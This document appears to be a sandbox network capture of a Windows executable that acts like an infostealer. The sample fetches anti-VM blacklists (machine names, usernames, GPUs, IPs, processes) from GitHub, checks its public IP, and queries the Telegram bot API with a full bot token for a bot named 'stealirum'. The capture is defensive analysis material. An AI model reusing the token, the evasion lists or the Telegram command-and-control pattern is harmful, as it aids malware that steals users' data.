                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.449738104.16.185.241806400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 29, 2024 12:28:34.414151907 CET39OUTGET / HTTP/1.1
                                                                                                                                                            Host: icanhazip.com
                                                                                                                                                            Nov 29, 2024 12:28:35.551759958 CET535INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:35 GMT
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Content-Length: 13
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                                            Set-Cookie: __cf_bm=DrcwygmpUF1jpFG6m_OGTSU3zNEQdHV3vtmlcfOifKA-1732879715-1.0.1.1-UExHgDN4lOQyn40wdxcDknfX8U7GBmE4RxEnNLIopiR6b64Lk83fBPgmbODBtXPPfgiuznRn5KuIGEPdshZxWw; path=/; expires=Fri, 29-Nov-24 11:58:35 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8ea2414d2b17f5fa-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                            Data Ascii: 8.46.123.228


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449733185.199.108.1334436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:27 UTC120OUTGET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:28 UTC898INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1246
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 7E09:1CF27F:96EA1:A565C:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740067-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.156952,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: c6d28eadeb78637b3f8b9ee1c3005b9c67a97ed9
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 194
                                                                                                                                                            2024-11-29 11:28:28 UTC1246INData Raw: 32 39 5f 5f 48 45 52 45 0a 32 47 36 43 37 5a 36 31 0a 32 52 4f 5f 38 55 56 55 0a 32 53 4e 35 33 38 4b 34 0a 35 4b 42 4b 34 31 5f 4c 0a 35 4c 58 50 41 38 45 53 0a 35 50 45 43 4e 36 4c 31 0a 35 52 50 46 54 33 48 5a 0a 36 42 4f 53 34 4f 37 55 0a 36 42 5a 50 32 59 32 5f 0a 36 46 34 34 41 44 52 37 0a 36 4d 50 41 39 33 0a 37 32 32 39 48 39 47 39 0a 37 34 5a 5a 43 59 37 41 0a 37 54 42 39 47 36 50 37 0a 38 34 4b 44 31 4b 53 4b 0a 38 4e 59 47 4b 33 46 4c 0a 38 59 33 42 53 58 4b 47 0a 39 53 46 37 32 46 47 37 0a 39 5a 37 37 44 4e 34 54 0a 5f 47 33 31 45 34 36 4e 0a 5f 50 48 4c 4e 59 47 52 0a 5f 54 39 57 35 4c 48 4f 0a 41 46 52 42 52 36 54 43 0a 41 4d 44 20 52 61 64 65 6f 6e 20 48 44 20 38 36 35 30 47 0a 41 53 50 45 45 44 20 47 72 61 70 68 69 63 73 20 46 61 6d 69 6c
                                                                                                                                                            Data Ascii: 29__HERE2G6C7Z612RO_8UVU2SN538K45KBK41_L5LXPA8ES5PECN6L15RPFT3HZ6BOS4O7U6BZP2Y2_6F44ADR76MPA937229H9G974ZZCY7A7TB9G6P784KD1KSK8NYGK3FL8Y3BSXKG9SF72FG79Z77DN4T_G31E46N_PHLNYGR_T9W5LHOAFRBR6TCAMD Radeon HD 8650GASPEED Graphics Famil


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.449732185.199.108.1334436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:27 UTC124OUTGET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:28 UTC898INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 3145
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 1C9C:194CD0:60A15:6E989:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740025-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.097268,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 290f52be9b7d73581df4f1b229f30bb8a3b67d96
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 100
                                                                                                                                                            2024-11-29 11:28:28 UTC1378INData Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50
                                                                                                                                                            Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
                                                                                                                                                            2024-11-29 11:28:28 UTC1378INData Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46
                                                                                                                                                            Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
                                                                                                                                                            2024-11-29 11:28:28 UTC389INData Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d
                                                                                                                                                            Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.449731185.199.108.1334436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:27 UTC128OUTGET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:28 UTC897INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1275
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: E854:128C4E:AEAFA:BD2CE:67498FF8
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740037-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.105303,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 12bc791959b53f3b7b42f4e580ec1f3d5909ab6c
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 98
                                                                                                                                                            2024-11-29 11:28:28 UTC1275INData Raw: 30 35 68 30 30 47 69 30 0a 30 35 4b 76 41 55 51 4b 50 51 0a 32 31 7a 4c 75 63 55 6e 66 49 38 35 0a 33 75 32 76 39 6d 38 0a 34 33 42 79 34 0a 34 74 67 69 69 7a 73 4c 69 6d 53 0a 35 73 49 42 4b 0a 35 59 33 79 37 33 0a 67 72 65 70 65 74 65 0a 36 34 46 32 74 4b 49 71 4f 35 0a 36 4f 34 4b 79 48 68 4a 58 42 69 52 0a 37 44 42 67 64 78 75 0a 37 77 6a 6c 47 58 37 50 6a 6c 57 34 0a 38 4c 6e 66 41 61 69 39 51 64 4a 52 0a 38 4e 6c 30 43 6f 6c 4e 51 35 62 71 0a 38 56 69 7a 53 4d 0a 39 79 6a 43 50 73 45 59 49 4d 48 0a 41 62 62 79 0a 61 63 6f 78 0a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 0a 41 6d 79 0a 61 6e 64 72 65 61 0a 41 70 70 4f 6e 46 6c 79 53 75 70 70 6f 72 74 0a 41 53 50 4e 45 54 0a 61 7a 75 72 65 0a 62 61 72 62 61 72 72 61 79 0a 62 65 6e 6a 61 68 0a 42 72 75 6e
                                                                                                                                                            Data Ascii: 05h00Gi005KvAUQKPQ21zLucUnfI853u2v9m843By44tgiizsLimS5sIBK5Y3y73grepete64F2tKIqO56O4KyHhJXBiR7DBgdxu7wjlGX7PjlW48LnfAai9QdJR8Nl0ColNQ5bq8VizSM9yjCPsEYIMHAbbyacoxAdministratorAmyandreaAppOnFlySupportASPNETazurebarbarraybenjahBrun


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.449730185.199.108.1334436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:27 UTC126OUTGET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:28 UTC895INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 31
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: F0F4:35108B:983CD:A6B92:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740045-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 9
                                                                                                                                                            X-Timer: S1732879708.144868,VS0,VE0
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: b5940fa9df9272d1ad101b0370a2949fda2c7d16
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 22
                                                                                                                                                            2024-11-29 11:28:28 UTC31INData Raw: 56 6d 52 65 6d 6f 74 65 47 75 65 73 74 2e 65 78 65 0a 53 79 73 6d 6f 6e 36 34 2e 65 78 65 0a
                                                                                                                                                            Data Ascii: VmRemoteGuest.exeSysmon64.exe


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.449735185.199.108.1334436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:27 UTC123OUTGET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:28 UTC897INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1110
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: AD0E:370AE7:92613:A0DDF:67498FF8
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740034-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.154255,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 4cbc6a08a38917a1997753704bbcb18e8195d8c7
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 22
                                                                                                                                                            2024-11-29 11:28:28 UTC1110INData Raw: 30 38 31 61 62 33 39 35 2d 35 65 38 35 2d 34 36 33 34 2d 61 63 64 62 2d 32 64 62 64 34 66 35 39 61 37 64 30 0a 30 38 39 65 36 32 31 63 2d 31 34 32 32 2d 34 38 35 36 2d 61 38 62 31 2d 33 66 31 64 62 32 30 38 63 65 39 65 0a 31 30 37 39 37 66 31 64 2d 39 36 31 33 2d 34 38 33 32 2d 62 31 61 33 2d 63 32 32 66 65 33 36 35 62 38 39 64 0a 31 35 39 34 37 38 30 32 2d 63 62 39 63 2d 34 37 38 66 2d 61 66 35 63 2d 33 33 62 31 61 62 62 64 31 62 66 65 0a 31 61 38 35 63 36 36 30 2d 31 66 39 38 2d 34 32 63 61 2d 62 31 63 62 2d 31 39 39 66 36 33 65 31 64 38 30 37 0a 32 62 35 33 36 35 66 31 2d 65 65 62 62 2d 34 31 33 35 2d 62 36 65 31 2d 34 31 33 61 61 62 32 39 39 66 63 62 0a 34 35 30 38 61 66 64 33 2d 35 66 30 35 2d 34 39 31 65 2d 62 34 39 66 2d 62 34 34 30 32 34 39 36 37
                                                                                                                                                            Data Ascii: 081ab395-5e85-4634-acdb-2dbd4f59a7d0089e621c-1422-4856-a8b1-3f1db208ce9e10797f1d-9613-4832-b1a3-c22fe365b89d15947802-cb9c-478f-af5c-33b1abbd1bfe1a85c660-1f98-42ca-b1cb-199f63e1d8072b5365f1-eebb-4135-b6e1-413aab299fcb4508afd3-5f05-491e-b49f-b44024967


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.449734185.199.108.1334436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:27 UTC119OUTGET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:28 UTC898INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 2853
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: DDA6:287308:A00E2:AE8A6:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.198609,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 1e2cc7ef7b49c53227aa621cf6e684b613c0f1d1
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 194
                                                                                                                                                            2024-11-29 11:28:28 UTC1378INData Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31
                                                                                                                                                            Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
                                                                                                                                                            2024-11-29 11:28:28 UTC1378INData Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34
                                                                                                                                                            Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
                                                                                                                                                            2024-11-29 11:28:28 UTC97INData Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a
                                                                                                                                                            Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.449736149.154.167.2204436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:30 UTC121OUTGET /bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe HTTP/1.1
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:30 UTC388INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:30 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 252
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2024-11-29 11:28:30 UTC252INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 37 37 38 35 32 34 35 32 37 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 74 65 61 6c 69 72 75 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 65 61 6c 69 72 75 6d 5f 62 6f 74 22 2c 22 63 61 6e 5f 6a 6f 69 6e 5f 67 72 6f 75 70 73 22 3a 74 72 75 65 2c 22 63 61 6e 5f 72 65 61 64 5f 61 6c 6c 5f 67 72 6f 75 70 5f 6d 65 73 73 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 73 75 70 70 6f 72 74 73 5f 69 6e 6c 69 6e 65 5f 71 75 65 72 69 65 73 22 3a 66 61 6c 73 65 2c 22 63 61 6e 5f 63 6f 6e 6e 65 63 74 5f 74 6f 5f 62 75 73 69 6e 65 73 73 22 3a 66 61 6c 73 65 2c 22 68 61 73 5f 6d 61 69 6e 5f 77 65 62 5f 61 70 70 22 3a 66 61 6c 73 65 7d 7d
